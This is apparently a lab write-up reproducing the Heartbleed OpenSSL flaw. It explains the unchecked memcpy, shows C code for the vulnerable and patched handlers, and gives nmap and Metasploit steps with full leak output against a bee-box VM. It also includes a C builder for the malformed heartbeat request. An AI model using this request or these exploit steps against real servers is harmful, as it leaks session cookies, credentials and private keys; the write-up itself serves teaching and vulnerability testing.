Heartbleed Vulnerability Reproduction

Root Cause

The TLS heartbeat extension (RFC 6520) lets one side send a heartbeat request carrying a payload plus a 16-bit payload length, which the other side echoes back. In OpenSSL 1.0.1 through 1.0.1f, the handler trusted the peer-supplied length and passed it straight to memcpy() without first checking it against the size of the record actually received. A request that declares a large length but carries only a few bytes therefore makes memcpy() copy up to about 64 KB (the 16-bit maximum) of adjacent heap memory into the response, which is then sent back to the attacker. Every malformed heartbeat leaks a fresh chunk of up to 64 KB of the process's memory, which can include session cookies, credentials and private key material. The flaw is tracked as CVE-2014-0160.
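The following added example (not code from the original post or from OpenSSL) models the handler logic described above on a plain byte buffer: the vulnerable version trusts the 16-bit payload length inside the heartbeat message, the patched version adds the two bounds checks that the OpenSSL 1.0.1g fix introduced. The struct and function names are simplified stand-ins for OpenSSL's tls1_process_heartbeat() and the record structure, and the simulated heap with a secret behind the request is constructed for the demo.

```c
/* Added Heartbleed root-cause illustration (CVE-2014-0160); not OpenSSL code.
 * Models tls1_process_heartbeat(): vulnerable = trust the declared length,
 * patched = check it against the real record length (the 1.0.1g fix).
 * Names are simplified stand-ins; the "heap" and secret are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16

/* A received TLS record: where the heartbeat message starts and how many
 * bytes the record really carried (OpenSSL's s->s3->rrec). */
struct record {
    const unsigned char *data;
    size_t length;
};

static uint16_t read_u16(const unsigned char *p) {
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Echoes 'payload' bytes from 'src' into a malloc'd response
 * (type, length, payload, padding). Caller frees. */
static unsigned char *echo_payload(const unsigned char *src, uint16_t payload, size_t *out_len) {
    size_t n = 1 + 2 + (size_t)payload + HB_PADDING;
    unsigned char *resp = malloc(n);
    if (!resp) return NULL;
    resp[0] = HB_RESPONSE;
    resp[1] = (unsigned char)(payload >> 8);
    resp[2] = (unsigned char)(payload & 0xff);
    memcpy(resp + 3, src, payload);            /* the unchecked memcpy() the post refers to */
    memset(resp + 3 + payload, 0, HB_PADDING);  /* OpenSSL fills this with random bytes */
    *out_len = n;
    return resp;
}

/* OpenSSL 1.0.1 - 1.0.1f: the declared length is never compared with
 * rec->length, so memcpy() reads up to 65535 bytes past the request. */
unsigned char *heartbeat_vulnerable(const struct record *rec, size_t *out_len) {
    const unsigned char *p = rec->data;
    if (p[0] != HB_REQUEST) return NULL;
    uint16_t payload = read_u16(p + 1);        /* attacker-controlled */
    return echo_payload(p + 3, payload, out_len);
}

/* OpenSSL 1.0.1g: the two bounds checks the fix added. A request whose
 * declared length exceeds the record is silently discarded. */
unsigned char *heartbeat_patched(const struct record *rec, size_t *out_len) {
    if (1 + 2 + HB_PADDING > rec->length) return NULL;
    const unsigned char *p = rec->data;
    if (p[0] != HB_REQUEST) return NULL;
    uint16_t payload = read_u16(p + 1);
    if (1 + 2 + (size_t)payload + HB_PADDING > rec->length) return NULL;
    return echo_payload(p + 3, payload, out_len);
}

/* Demo scenario (constructed): a request carrying 4 payload bytes but
 * declaring 128, followed in the same simulated heap by a secret. The
 * over-read is kept inside 'heap' so the demo itself stays well-defined;
 * on a real server it runs off the end of the record into live heap data. */
#define DECLARED 128u
static unsigned char heap[256];

static struct record make_request(void) {
    memset(heap, 0, sizeof heap);
    heap[0] = HB_REQUEST;
    heap[1] = (unsigned char)(DECLARED >> 8);
    heap[2] = (unsigned char)(DECLARED & 0xff);
    memcpy(heap + 3, "ping", 4);               /* heap[7..22]: padding of a well-formed request */
    memcpy(heap + 32, "SESSION=4f2a-very-secret-cookie", 31);
    struct record rec = { heap, 1 + 2 + 4 + HB_PADDING };   /* 23 bytes really received */
    return rec;
}

/* Offset in the vulnerable response at which the secret appears, -1 if none.
 * With the layout above it is 32: 3-byte header + 29 bytes into the over-read. */
int demo_leak_offset(void) {
    struct record rec = make_request();
    size_t n = 0;
    unsigned char *resp = heartbeat_vulnerable(&rec, &n);
    if (!resp) return -1;
    int off = -1;
    for (size_t i = 0; i + 7 <= n; i++)
        if (memcmp(resp + i, "SESSION", 7) == 0) { off = (int)i; break; }
    free(resp);
    return off;
}

/* 1 if the patched handler refuses the same malformed request. */
int demo_patched_refuses(void) {
    struct record rec = make_request();
    size_t n = 0;
    unsigned char *resp = heartbeat_patched(&rec, &n);
    if (resp) { free(resp); return 0; }
    return 1;
}

int main(void) {
    printf("vulnerable: secret found at response offset %d\n", demo_leak_offset());
    printf("patched: request refused = %d\n", demo_patched_refuses());
    return 0;
}
```

The response from the vulnerable handler is 1 + 2 + 128 + 16 = 147 bytes although the request was 23 bytes long; everything after the first 4 echoed bytes is memory that was never part of the request. The patched handler returns nothing at all, which is why scanners treat a missing or correctly sized heartbeat reply as "not vulnerable".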

Reproduction

Setup

kali:192.168.239.131
bee-box:192.168.239.138

Procedure

Ping bee-box from kali to check connectivity.
Then run nmap -O to confirm that port 8443 is open.
Then use nmap's ssl-heartbleed.nse script to check whether the vulnerability is present:
nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.239.138
The script reports the host as vulnerable; next, use msf (Metasploit) to exploit it.
root@192:~# msfconsole

       =[ metasploit v6.0.17-dev                          ]
+ -- --=[ 2076 exploits - 1124 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more

msf6 > search heartbleed

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   1  auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/server/openssl_heartbeat_client_memory

msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.239.138
rhost => 192.168.239.138
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 192.168.239.138:8443 - Leaking heartbeat response #1
[*] 192.168.239.138:8443 - Sending Client Hello...
[*] 192.168.239.138:8443 - SSL record #1:
[*] 192.168.239.138:8443 -   Type: 22
[*] 192.168.239.138:8443 -   Version: 0x0301
[*] 192.168.239.138:8443 -   Length: 86
[*] 192.168.239.138:8443 -   Handshake #1:
[*] 192.168.239.138:8443 -     Length: 82
[*] 192.168.239.138:8443 -     Type: Server Hello (2)
[*] 192.168.239.138:8443 -     Server Hello Version: 0x0301
[*] 192.168.239.138:8443 -     Server Hello random data: 62202699b1eeba384c601bfa314e64ac091a7553f2a15a7aa567f552654ca23e
[*] 192.168.239.138:8443 -     Server Hello Session ID length: 32
[*] 192.168.239.138:8443 -     Server Hello Session ID: 96ae86840850e9cb77ceabcf847ce4309d3abd9e2cf53e50c1b0a9845e524383
[*] 192.168.239.138:8443 - SSL record #2:
[*] 192.168.239.138:8443 -   Type: 22
[*] 192.168.239.138:8443 -   Version: 0x0301
[*] 192.168.239.138:8443 -   Length: 675
[*] 192.168.239.138:8443 -   Handshake #1:
[*] 192.168.239.138:8443 -     Length: 671
[*] 192.168.239.138:8443 -     Type: Certificate Data (11)
[*] 192.168.239.138:8443 -     Certificates length: 668
[*] 192.168.239.138:8443 -     Data length: 671
[*] 192.168.239.138:8443 -     Certificate #1:
[*] 192.168.239.138:8443 -       Certificate #1: Length: 665
[*] 192.168.239.138:8443 -       Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, issuer=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, serial=#<OpenSSL::BN:0x00005582db39cb88>, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[*] 192.168.239.138:8443 - SSL record #3:
[*] 192.168.239.138:8443 -   Type: 22
[*] 192.168.239.138:8443 -   Version: 0x0301
[*] 192.168.239.138:8443 -   Length: 203
[*] 192.168.239.138:8443 -   Handshake #1:
[*] 192.168.239.138:8443 -     Length: 199
[*] 192.168.239.138:8443 -     Type: Server Key Exchange (12)
[*] 192.168.239.138:8443 - SSL record #4:
[*] 192.168.239.138:8443 -   Type: 22
[*] 192.168.239.138:8443 -   Version: 0x0301
[*] 192.168.239.138:8443 -   Length: 4
[*] 192.168.239.138:8443 -   Handshake #1:
[*] 192.168.239.138:8443 -     Length: 0
[*] 192.168.239.138:8443 -     Type: Server Hello Done (14)
[*] 192.168.239.138:8443 - Sending Heartbeat...
[*] 192.168.239.138:8443 - Heartbeat response, 13027 bytes
[+] 192.168.239.138:8443 - Heartbeat response with leak, 13027 bytes
[*] 192.168.239.138:8443 - Printable info leaked:
…b…[…K~#.Mu…@…%....f.....".!.9.8.........5.............................3.2.....E.D...../...A.........................................c.v...........R.z.....3.J...0...h.6.E.a.......&...4. ...g..b…d…|…k.s…2…>…w.Y.A…e.7…F…w.[…K…i.O…P…=.d…P…j…;…p…U…0.}.B.’…e.;…’.#.T…F.&…x…-…Z…~.G…X…<…@…D… …Q…~…{.y…^.t.s.I.,.q.n…o.m.l.k.j.V.i… . g . f . . . . . .g.f..... .g.f.....…a.u.y…Z…C.Y./.?.X…9.W…V.T….<…Q.O.+…%.J.2…E…D.C.A…@.=.H…4.R.M.#.5…:.6.h…5.m…/…-.%…)…L.".!..N…:…l…r…(…x…f…S…]…t.1…c.b.S.>.9.7.3… repeated 11974 times …
[*] 192.168.239.138:8443 - Scanned 1 of 1 hosts (100% complete)

The module completes the handshake up to Server Hello Done (records #1 to #4 above), then sends a single heartbeat request that carries only a few bytes of payload. The server answered with 13027 bytes, far more than it was sent, which is the over-read the [+] "with leak" line reports. On an idle lab VM such as bee-box the dump contains little besides the server's own TLS buffers; against a busy server, repeated leaks (see the LEAK_COUNT option) return whatever else happens to sit in the process heap at that moment.
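The following added example (not code from the nmap script, the Metasploit module or the original post) shows the check both scanners make: build a heartbeat record whose declared payload length is far larger than the payload actually sent, then judge the reply by whether the server echoed more bytes than it received. The wire format follows RFC 5246 (TLS record header) and RFC 6520 (heartbeat message); the 0x4000 declared length and the sample response bytes are constructed for this demo, not taken from the bee-box run above.

```c
/* Added example of a Heartbleed scanner's request and verdict logic; not code
 * from nmap, Metasploit or the original post. Format per RFC 5246 / RFC 6520.
 * The 0x4000 declared length and the sample responses are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLS_HEARTBEAT   24      /* TLS content type of a heartbeat record */
#define TLS_VERSION_1_0 0x0301  /* the version shown in the msf output above */
#define HB_REQUEST      1
#define HB_RESPONSE     2
#define HB_PADDING      16

/* Builds the malformed request: a TLS heartbeat record whose inner declared
 * payload length ('declared') is far larger than the payload actually sent.
 * Returns the record size, or 0 if 'out' is too small. */
size_t build_heartbeat_request(unsigned char *out, size_t cap, uint16_t declared,
                               const unsigned char *payload, size_t payload_len) {
    size_t body = 1 + 2 + payload_len;       /* hb type, declared length, real payload */
    if (body > 0xffff || cap < 5 + body) return 0;
    out[0] = TLS_HEARTBEAT;
    out[1] = TLS_VERSION_1_0 >> 8;
    out[2] = TLS_VERSION_1_0 & 0xff;
    out[3] = (unsigned char)(body >> 8);
    out[4] = (unsigned char)(body & 0xff);
    out[5] = HB_REQUEST;
    out[6] = (unsigned char)(declared >> 8);
    out[7] = (unsigned char)(declared & 0xff);
    memcpy(out + 8, payload, payload_len);
    return 5 + body;
}

/* Judges one TLS record received after the request. Returns the number of
 * echoed payload bytes beyond what we actually sent (the leaked bytes), 0 for
 * a correct echo or a non-heartbeat record (e.g. an alert), -1 if the record
 * is malformed or truncated. */
long classify_response(const unsigned char *rec, size_t n, size_t sent_payload) {
    if (n < 5) return -1;
    if (rec[0] != TLS_HEARTBEAT) return 0;
    size_t len = ((size_t)rec[3] << 8) | rec[4];
    if (len < 3 || n < 5 + len) return -1;
    if (rec[5] != HB_RESPONSE) return -1;
    size_t echoed = ((size_t)rec[6] << 8) | rec[7];
    if (echoed > len - 3) return -1;         /* claims more than the record carries */
    return echoed > sent_payload ? (long)(echoed - sent_payload) : 0;
}

/* Constructs a server's heartbeat response echoing 'echoed' payload bytes. */
static size_t make_response(unsigned char *out, size_t echoed) {
    size_t body = 1 + 2 + echoed + HB_PADDING;
    memset(out, 0, 5 + body);
    out[0] = TLS_HEARTBEAT; out[1] = 0x03; out[2] = 0x01;
    out[3] = (unsigned char)(body >> 8); out[4] = (unsigned char)(body & 0xff);
    out[5] = HB_RESPONSE;
    out[6] = (unsigned char)(echoed >> 8); out[7] = (unsigned char)(echoed & 0xff);
    memcpy(out + 8, "ping", 4);              /* the bytes we really sent */
    if (echoed > 4 + 32)                     /* constructed "adjacent heap" content */
        memcpy(out + 12, "Cookie: PHPSESSID=constructed-sample", 36);
    return 5 + body;
}

static unsigned char buf[5 + 3 + 0x4000 + HB_PADDING];

/* The request a scanner sends: 4 real bytes, 0x4000 declared. Returns 12. */
size_t demo_request_length(void) {
    return build_heartbeat_request(buf, sizeof buf, 0x4000, (const unsigned char *)"ping", 4);
}

/* A vulnerable server echoes the full 0x4000 declared bytes: 16380 leaked. */
long demo_leaky_response(void) {
    size_t n = make_response(buf, 0x4000);
    return classify_response(buf, n, 4);
}

/* A patched server only ever echoes what it received: 0 leaked. */
long demo_correct_echo(void) {
    size_t n = make_response(buf, 4);
    return classify_response(buf, n, 4);
}

int main(void) {
    printf("request bytes on the wire: %zu\n", demo_request_length());
    printf("leaked bytes, vulnerable server: %ld\n", demo_leaky_response());
    printf("leaked bytes, patched server:    %ld\n", demo_correct_echo());
    return 0;
}
```

A real scanner sends the 12-byte request only after the handshake has reached Server Hello Done, exactly as the msf trace shows, and must read the reply across several TCP reads because a leaky response is many kilobytes long; a patched OpenSSL discards the malformed request silently, so a timeout with no heartbeat record is the other common "not vulnerable" outcome.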
